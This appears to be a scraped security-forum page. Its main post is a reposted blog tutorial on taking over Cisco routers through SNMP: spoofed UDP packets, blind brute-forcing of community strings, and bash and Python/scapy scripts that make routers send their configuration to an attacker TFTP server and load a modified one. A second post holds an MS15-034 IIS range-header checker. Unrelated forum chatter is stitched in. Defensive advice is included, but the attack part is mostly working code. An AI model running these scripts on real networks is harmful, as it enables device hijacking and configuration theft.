Hacking networks with SNMP Posted on April 21, 2015 by Torstein Summary Exploiting common misconfigurations in network systems allows an attacker to gather and use information to take over and control network devices. This can be done just as easily to core equipment as to Customer-Premises Equipment(CPE). A large scale attack will make it possible to hijack an entire Internet Service Provider(ISP) within a very short time. This demonstration will be done against a virtualized Cisco network, but the same techniques applies to other vendors like Juniper, HP, Linux and others. Virtualization To prevent doing any damage to real networks, I will use GNS3 with Cisco to emulate a basic WAN. As for the attacking computer, a virtual Kali Linux will be attached to the network. Attacker IP: 80.200.43.20 Cisco configuration example for SNMP and NTP: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [/TD] [TD=class: crayon-code]interface GigabitEthernet0/0 ip address 88.0.3.10 255.255.255.0 ! ip access-list standard management remark ### NTP ### permit 80.2.0.64 remark ### SNMP ### permit 80.2.0.33 ! snmp-server community _________ RW management ! line vty 0 4 access-class management in ! ntp server 80.2.0.64 [/TD] [/TR] [/TABLE] Discovering devices The initial scan plays an important role in discovering remote vulnerable devices. SNMP is configured with a access-lists will still indicate a open port by connecting to it. The access-list will of-course deny any type of requests you make to the device unless the packet comes from a allowed IP. One of the easiest way to discover what type of network device you are up against, is by running a ntp query. By configuring “ntp server x.x.x.x”, are we not only synchronizing the device to that time-server, but it also turns the device into a NTP server itself. This allows us to find some unwanted information like equipment type and Refid which is equal to the NTP server’s server, along with a possible target for NTP reflection attacks. Apply some common sense, whois lookups and brute DNS tools – it won’t take long before you know where the management serverpool is. Cisco devices vulnerable to CVE-2014-3309 also seem to be open for NTP queries like this. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums]1 2 [/TD] [TD=class: crayon-code]ntp server 80.2.0.64 ntp access-group peer management [/TD] [/TR] [/TABLE] This can be avoided by configuring a access-list associated with NTP configuration, firewalling the device or Control Plane Policing. Hacking SNMP Blindfloded Spoofing UDP packets source address will bypass the SNMP access-list “management”, and by blasting away thousands of passwords/sec may find the SNMP community string. The question is, how do we know when we found the correct community string? By sending IP spoofed Object Identifiers (OID’s) to the SNMP Management Information Base (MIB), we are able to tell the router to execute a command IF our community string is accepted. Decided to do some performance testing on live equipment and a Cisco 881-k9 where only able to handle 40000 attacks/min due to poor CPU performance. Split a dictionary between 100 CPE’s like the 881-k9 and you will be able to test ~4mill passwords/min. So, how is this really done? [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums]1 2 3 4 5 6 7 8 9 10 11 [/TD] [TD=class: crayon-code]Spoof source IP: 80.2.0.64, Destination mr router: 88.0.3.10 Hello mr router. The secret is "public", please ping 80.200.43.20 - wrong secret, request dropped - Hello mr router. The secret is "private", please ping 80.200.43.20 - correct secret, request accepted - - sending ICMP packet to 80.200.43.20 as you asked for - Network sniffer detecting a ICMP packet from mr router(88.0.3.10) Correct secret was found for mr router between line(RTT+0.1sec) and line(current time) [/TD] [/TR] [/TABLE] We got the community – so how to get access? More spoofing! Send another batch of spoofed OID’s to the router, we are now able to tell the router to upload its configuration to a TFTP server. (I had some issues with TFTP in Kali, so I booted a Ubuntu machine running xinetd with the IP 80.200.43.21.) After analyzing the router configuration, we can make a few modifications like adding a new user and removing the management access-lists for VTY. Now we can upload the new configuration back to the router with similar OID’s asking the router to download a file from the TFTP server and import it to the running-config. How to protect your equipment 1. BCP 38/RFC 2827 Source-address filter your network, a router will stop any packets not matching the reverse route for the senders source address. BCP38 should be enabled at the edge of your network facing both customers and other Internet Service Providers. This does not only protect you and other against this type of attacks, but also UDP reflection DDoS attacks. Warning: A network with asymmetrical routing may experience issues with BCP38 2. SNMPv3 SNMP version 3 offers both username and password support. Spoofing SNMPv3 is way more difficult than SNMPv 1-2c and due to password and packet encryption, discovery handshake and message integrity checks. 3. Filtering Deny NTP and SNMP with Access Control Lists(ACL), Control Plane Policing (CoPP) or firewalls. 4. Testing Do a network scan on equipment before you deploy a new model to check for unwanted services and ports. Edit: after speaking with Cisco PSIRT, I was recommended the following materials to fortify and protect network devices. There won’t be any security advisory/CVE since UDP spoofing-attack is a known issue – even considering it’s a new attack vector. Cisco Guide to Harden Cisco IOS Device Team CYMRU – Secure IOS template Concept code Download config [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [/TD] [TD=class: crayon-code]#!/bin/bash STRING=private IP=88.0.3.10 SOURCEIP=80.2.0.64 TFTP=80.200.43.21 FILENAME=running-config iptables -t nat -A POSTROUTING -p udp --dport 161 -j SNAT --to-source $SOURCEIP snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 6 snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.2.111 i 1 snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.3.111 i 4 snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.4.111 i 1 snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.5.111 a $TFTP snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.6.111 s $FILENAME snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 1 iptables -t nat -D POSTROUTING -p udp --dport 161 -j SNAT --to-source $SOURCEIP [/TD] [/TR] [/TABLE] Upload config [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [/TD] [TD=class: crayon-code]#!/bin/bash STRING=private IP=88.0.3.10 SOURCEIP=80.2.0.64 TFTP=80.200.43.21 FILENAME=change-config iptables -t nat -A POSTROUTING -p udp --dport 161 -j SNAT --to-source $SOURCEIP snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 6 snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.2.111 i 1 snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.3.111 i 1 snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.4.111 i 4 snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.5.111 a $TFTP snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.6.111 s $FILENAME snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 1 iptables -t nat -D POSTROUTING -p udp --dport 161 -j SNAT --to-source $SOURCEIP [/TD] [/TR] [/TABLE] Blind Password cracking – POC [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 [/TD] [TD=class: crayon-code]#!/usr/bin/python import socket, sys, time from scapy.all import * from multiprocessing import Process, Array iptoping = '\x50\xc8\x2b\x14' # 80.200.43.20 in hex ipaddr = ['88.0.3.14','88.0.3.6','88.0.3.10'] # target routers spoofedserver = '80.2.0.64' # ntpq -c rv TARGET_CPE | grep refid # Need to be permitted by router's snmp ACL snmpfile = 'best-snmppasswords.txt' defaultdelay = 0.0011 rtt = 1 #ms delay to targets # check if loopback-interface with spoofed IP is up and running stest = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: stest.bind((spoofedserver, 0)) except: print "ifconfig lo:0 " + spoofedserver + " netmask 255.255.255.255 up" sys.exit() rtt = rtt/1000 defaultdelay = int(defaultdelay*1000000) def snmpscan(ip, delayhigh, stop, dictline, c, minline, maxline): # add delays and such f = open(snmpfile, 'r') s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) delay = delayhigh[c]/1000000.0 s.bind((spoofedserver, 500+c)) counter = 1 for community in f: if stop[c] == True: return if (minline[c] <= counter and maxline[c] >= counter) or maxline[c] == 0: community = community.rstrip() snmp = [] # packet length need to be included in SNMP. length = str("%0.2x" % (len(community))).decode('hex') splen = str("%0.2x" % (len(community)+42)).decode('hex') xplen = str("%0.2x" % (len(community)+49)).decode('hex') yplen = str("%0.2x" % (len(community)+45)).decode('hex') snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community + '\xa3\x23\x02\x04\x1e\x4d\xa9\x90\x02\x01\x00\x02\x01\x00\x30' '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01' '\x01\x10\x82\x4d\x02\x01\x06') snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community + '\xa3\x23\x02\x04\x1a\x91\xe1\x36\x02\x01\x00\x02\x01\x00\x30' '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01' '\x01\x10\x82\x4d\x02\x01\x05') snmp.append('\x30' + xplen + '\x02\x01\x00\x04' + length + community + '\xa3\x2a\x02\x04\x6e\xaf\x5b\x8c\x02\x01\x00\x02\x01\x00\x30' '\x1c\x30\x1a\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01' '\x01\x0f\x82\x4d\x04\x08\x61\x6e\x79\x5f\x6e\x61\x6d\x65') snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community + '\xa3\x23\x02\x04\x66\x9c\x88\x99\x02\x01\x00\x02\x01\x00\x30' '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01' '\x01\x02\x82\x4d\x02\x01\x01') snmp.append('\x30' + yplen + '\x02\x01\x00\x04' + length + community + '\xa3\x26\x02\x04\x13\x3a\x66\x29\x02\x01\x00\x02\x01\x00\x30' '\x18\x30\x16\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01' '\x01\x03\x82\x4d\x04\x04' + iptoping) snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community + '\xa3\x23\x02\x04\x21\x98\x9b\xcd\x02\x01\x00\x02\x01\x00\x30' '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01' '\x01\x04\x82\x4d\x02\x01\x01') # last hex = number of icmp packets snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community + '\xa3\x23\x02\x04\x7c\xe9\x79\x42\x02\x01\x00\x02\x01\x00\x30' '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01' '\x01\x10\x82\x4d\x02\x01\x01') for payload in snmp: s.sendto(payload, (ip, 161)) dictline[c] = counter time.sleep(delay) if stop[c] == True: return counter += 1 f.close() stop[c] = True def reply(packet): try: if packet[iCMP]: pos = ipaddr.index(packet[iP].src) except: return for x in processes: if x.name == ipaddr[pos]: minline[pos] = int((dictline[pos]-(0.05+rtt)/(delay[pos]/1000000.0))+1) if 0 < (0.05+rtt)/(delay[pos]/1000000.0) else 1 maxline[pos] = dictline[pos] if minline[pos] == maxline[pos]: f = open(snmpfile, 'r') g = 1 for lines in f: if g == maxline[pos]: print 'SNMP Community for', ipaddr[pos], 'is:', lines.rstrip() g += 1 else: print '%s snmp community found between line %d and %d in %s. Please wait while narrowing it down.'%(ipaddr[pos], int((dictline[pos]-(0.05+rtt)/(delay[pos]/1000000.0))+1) if 0 < (0.05+rtt)/(delay[pos]/1000000.0) else 1, dictline[pos], snmpfile) stop[pos] == True x.terminate() time.sleep(1) # wait for existing thread to stop dictline[pos] = 1 stop[pos] = False delay[pos] = delay[pos]*5 p = Process(target=snmpscan, name=ipaddr[pos], args=(ipaddr[pos], delay, stop, dictline, pos, minline, maxline)) processes[pos] = p p.start() if __name__ == "__main__": global processes processes = [] dictline = Array('i', [1]*len(ipaddr)) stop = Array('i', [False]*len(ipaddr)) minline = Array('i', [0]*len(ipaddr)) maxline = Array('i', [0]*len(ipaddr)) delay = Array('i', [defaultdelay]*len(ipaddr)) c = 0 for a in ipaddr: p = Process(target=snmpscan, name=a, args=(a, delay, stop, dictline, c, minline, maxline)) processes.append(p) p.start() c += 1 sniff(prn=reply, filter="icmp", store=0) [/TD] [/TR] [/TABLE] Sursa: https://0x41.no/hacking-networks-with-snmp/

Microsoft expands its bug bounty programs to include Azure, Sway, and Project Spartan | VentureBeat | Security | by Emil Protalinski

Se poate scoate butonul de Dislike din AdminCP, rapid.

'''___. .___ __ __ \_ |__ ____ ___.__. ____ ____ __| _// |________ __ __ _______/ |_ | __ \_/ __ < | |/ _ \ / \ / __ |\ __\_ __ \ | \/ ___/\ __\ | \_\ \ ___/\___ ( <_> ) | \/ /_/ | | | | | \/ | /\___ \ | | |___ /\___ > ____|\____/|___| /\____ | |__| |__| |____//____ > |__| \/ \/\/ \/ \/ \/ MS15-034 Checker Danger! This script has not been properly qa'd and will probably fail in terrible ways. It is based off a change in HTTP!UlpParseRange in which an error code is returned as a result of a call to HTTP!RtlULongLongAdd when evaluating the upper and lower range of an HTTP range request. -BF 8a8b2112 56 push esi 8a8b2113 6a00 push 0 8a8b2115 2bc7 sub eax,edi 8a8b2117 6a01 push 1 8a8b2119 1bca sbb ecx,edx 8a8b211b 51 push ecx 8a8b211c 50 push eax 8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here ''' import socket import random ipAddr = "" hexAllFfff = "18446744073709551615" req1 = "GET / HTTP/1.0\r\n\r\n" req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n" print " [*] Audit Started" client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client_socket.connect((ipAddr, 80)) client_socket.send(req1) boringResp = client_socket.recv(1024) if "Microsoft" not in boringResp: print " [*] Not IIS" exit(0) client_socket.close() client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client_socket.connect((ipAddr, 80)) client_socket.send(req) goodResp = client_socket.recv(1024) if "Requested Range Not Satisfiable" in goodResp: print "[!!] Looks VULN" elif " The request has an invalid header name" in goodResp: print " [*] Looks Patched" else: print " [*] Unexpected response, cannot discern patch status" Sursa: http://pastebin.com/raw.php?i=ypURDPc4

E misto modulul de fuzzing. Nu face mare lucru, dar luand la mana raspunsurile poate fi foarte util.

Changes: A new attack mode has been added. A completely new fuzzing dialog has been introduced that allows multiple injection points to be attacked at the same time. Various other updates and additions.

Cand am dat eu, probabil si acum: pix si hartie. Si sunt doua parti: Info si Mate.